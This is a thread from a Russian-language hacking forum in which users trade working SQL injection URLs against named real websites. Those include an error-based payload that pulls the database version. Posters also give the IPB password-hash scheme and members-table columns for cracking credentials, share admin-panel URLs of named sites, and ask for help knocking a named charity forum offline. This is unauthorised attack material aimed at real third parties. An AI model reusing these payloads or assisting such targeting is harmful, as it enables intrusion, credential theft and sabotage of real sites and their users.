ANTICHAT — форум по информационной безопасности, OSINT и технологиям

http://www.editrans.de/?view=article&id=6+and+substring(version(),1,1)=5

а вот так не прокатило

http://www.editrans.de/?view=article&id=-6+or(1,1)=(select+count(0),concat((select+version( )+from+information_schema.tables+limit+0,1),floor( rand(0)*2))from(information_schema.tables)group+by +2)--+

Вот так и крути.

Оффтоп: цитировать предыдущее сообщение не нужно

Где IPB 3+ хранит соль?

И какой алгаритм шифровки искользуется?

Везде написано что в members_pass_salt ,но чет не видать( может быть что без соли ?

Columns: Table ibf_members

name

mgroup

email

joined

ip_address

posts

title

allow_admin_mails

time_offset

hide_email

email_pm

email_full

skin

warn_level

warn_lastwarn

language

last_post

restrict_post

view_sigs

view_img

view_avs

view_pop

bday_day

bday_month

bday_year

new_msg

msg_total

show_popup

misc

last_visit

last_activity

dst_in_use

view_prefs

coppa_user

mod_posts

auto_track

orig_name

lastnamechange

namehistory

org_perm_id

temp_ban

sub_end

login_anonymous

ignored_users

mgroup_others

member_login_key

member_login_key_expire

subs_pkg_chosen

has_blog

members_auto_dst

members_cache

members_disable_pm

members_display_name

members_created_remote

members_editor_choice

members_markers

members_profile_views

members_l_display_name

members_l_username

failed_logins

failed_login_count

has_gallery

gallery_perms

t23_pcr_time

ip_geo

http://www.elixirherbals.com

md5(md5($salt).md5($pass))

http://www.lstc.edu

Буду безумно благодарен, если кто поможет найти админку

Вот это нашел только, хз то или нет)

2 Dare

http://www.lstc.edu/intranet/

2 Bramin

http://www.elixirherbals.com:2082/

Вот это не подойдет?

А вообще ты глянь из какой ты базы данных хочешь пароли-явки взять.

Парни, всем привет. В общем не мое это дело, ломать форумы, я обычный программист, но стала такая ситуация очень нужной, а разобраться до самого последнего конца не могу.

Есть форум: _forum.help-animal. org.ua

Настоящая организация уже давно уехала с форума, делает себе новый сайт, а владелец этого форума еще пишет от ихнего имени.

Цель: Сделать сайт недоступным для общества.

Я так понял, форум вообще не защищен, так как устанавливали люди, которые в этом деле не совсем разбираются.

Я понимаю, что никто на блюдечке мне не принесет пароль администратора, по этому прошу хотя-бы подсказать путь, в каком направлении мне двигаться.

Буду раз за помощь.

В данной ситуации я смог только увидеть chenlog.html, установить Perl и начать запускать готовые pl скрипты, но дальше тупик. Понять суть заливания шелов тоже не могу, подмена печенек в этой версии форума, как я понял невозможна, за sql "прививки" вообще молчу . Так-что я продвинулся не так далеко, как бы хотел.